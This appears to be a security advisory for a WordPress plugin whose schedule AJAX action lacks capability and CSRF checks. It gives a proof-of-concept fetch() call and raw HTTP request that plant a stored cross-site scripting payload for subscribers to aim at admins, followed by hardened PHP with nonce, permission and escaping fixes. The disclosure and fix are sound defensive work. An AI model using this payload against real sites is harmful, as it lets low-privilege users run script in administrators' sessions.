The plugin does not have capability and CSRF checks in the rtb_welcome_set_schedule AJAX action, allowing any authenticated user to call it. Due to the lack of sanitisation and escaping, users with a role as low as subscriber could perform Cross-Site Scripting attacks against logged-in admins.
As a subscriber:
fetch("https://example.com/wp-admin/admin-ajax.php", {
    "headers": {
        "content-type": "application/x-www-form-urlencoded",
    },
    "body": new URLSearchParams({"action":"rtb_welcome_set_schedule", "schedule_open": '{"\\"><script>if (!window.alreadyExploited) alert(1); window.alreadyExploited = 1;</script>": {"weekdays":{"wednesday":"1"},"time":{"start":"1:45 AM","end":""}}}'}),
    "method": "POST",
    "credentials": "include"
})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 316
Connection: close
Cookie: [any authenticated user]
action=rtb_welcome_set_schedule&schedule_open=%7B%22%5C%22%3E%3Cscript%3Eif+%28%21window.alreadyExploited%29+alert%28%2FXSS%2F%29%3B+window.alreadyExploited+%3D+1%3B%3C%2Fscript%3E%22%3A+%7B%22weekdays%22%3A%7B%22wednesday%22%3A%221%22%7D%2C%22time%22%3A%7B%22start%22%3A%221%3A45+AM%22%2C%22end%22%3A%22%22%7D%7D%7D
The XSS then triggers on the plugin's settings page: https://example.com/wp-admin/admin.php?page=rtb-settings
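A hardened version of such a handler, as an added example rather than the plugin's own code: the nonce and capability checks close the CSRF and authorisation gap described above, and the schedule_open payload is validated, sanitised and escaped before it is stored and rendered. The rtb_example_* function names, the option name and the nonce action are assumptions.

```php
<?php
// Added example, not the plugin's code. The rtb_example_* names, the option
// name and the nonce action are assumptions chosen for illustration.
add_action( 'wp_ajax_rtb_welcome_set_schedule', 'rtb_example_set_schedule' );
function rtb_example_set_schedule() {
    // CSRF: the request must carry a valid nonce issued for this action.
    check_ajax_referer( 'rtb_example_schedule_nonce', 'nonce' );
    // Authorisation: a subscriber lacks manage_options and is rejected here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient permissions', 403 );
    }
    $raw     = isset( $_POST['schedule_open'] ) ? wp_unslash( $_POST['schedule_open'] ) : '';
    $decoded = json_decode( $raw, true );
    if ( ! is_array( $decoded ) ) {
        wp_send_json_error( 'Invalid schedule', 400 );
    }
    // Validation: only known weekdays and a strict "h:mm AM/PM" time are kept;
    // the caller-controlled rule name is reduced to a sanitised text label.
    $days    = array( 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday' );
    $time_re = '/^(1[0-2]|[1-9]):[0-5][0-9] (AM|PM)$/';
    $clean   = array();
    foreach ( $decoded as $label => $rule ) {
        $label = sanitize_text_field( (string) $label );
        if ( '' === $label || ! is_array( $rule ) ) {
            continue;
        }
        $weekdays = array();
        foreach ( (array) ( $rule['weekdays'] ?? array() ) as $day => $on ) {
            if ( in_array( $day, $days, true ) && '1' === (string) $on ) {
                $weekdays[ $day ] = '1';
            }
        }
        $start = (string) ( $rule['time']['start'] ?? '' );
        $end   = (string) ( $rule['time']['end'] ?? '' );
        $clean[ $label ] = array( 'weekdays' => $weekdays, 'time' => array(
            'start' => preg_match( $time_re, $start ) ? $start : '',
            'end'   => preg_match( $time_re, $end ) ? $end : '',
        ) );
    }
    update_option( 'rtb_example_schedule_open', $clean );
    wp_send_json_success( $clean );
}
// Output escaping on the settings page: labels are escaped even after sanitisation,
// so a stored "> or <script> sequence is rendered as text, not markup.
function rtb_example_render_schedule() {
    foreach ( (array) get_option( 'rtb_example_schedule_open', array() ) as $label => $rule ) {
        printf( '<input type="text" value="%s">', esc_attr( $label ) );
    }
}
```

The settings page must emit the matching nonce with wp_create_nonce( 'rtb_example_schedule_nonce' ) and the client must send it as the nonce POST field, otherwise check_ajax_referer() terminates the request.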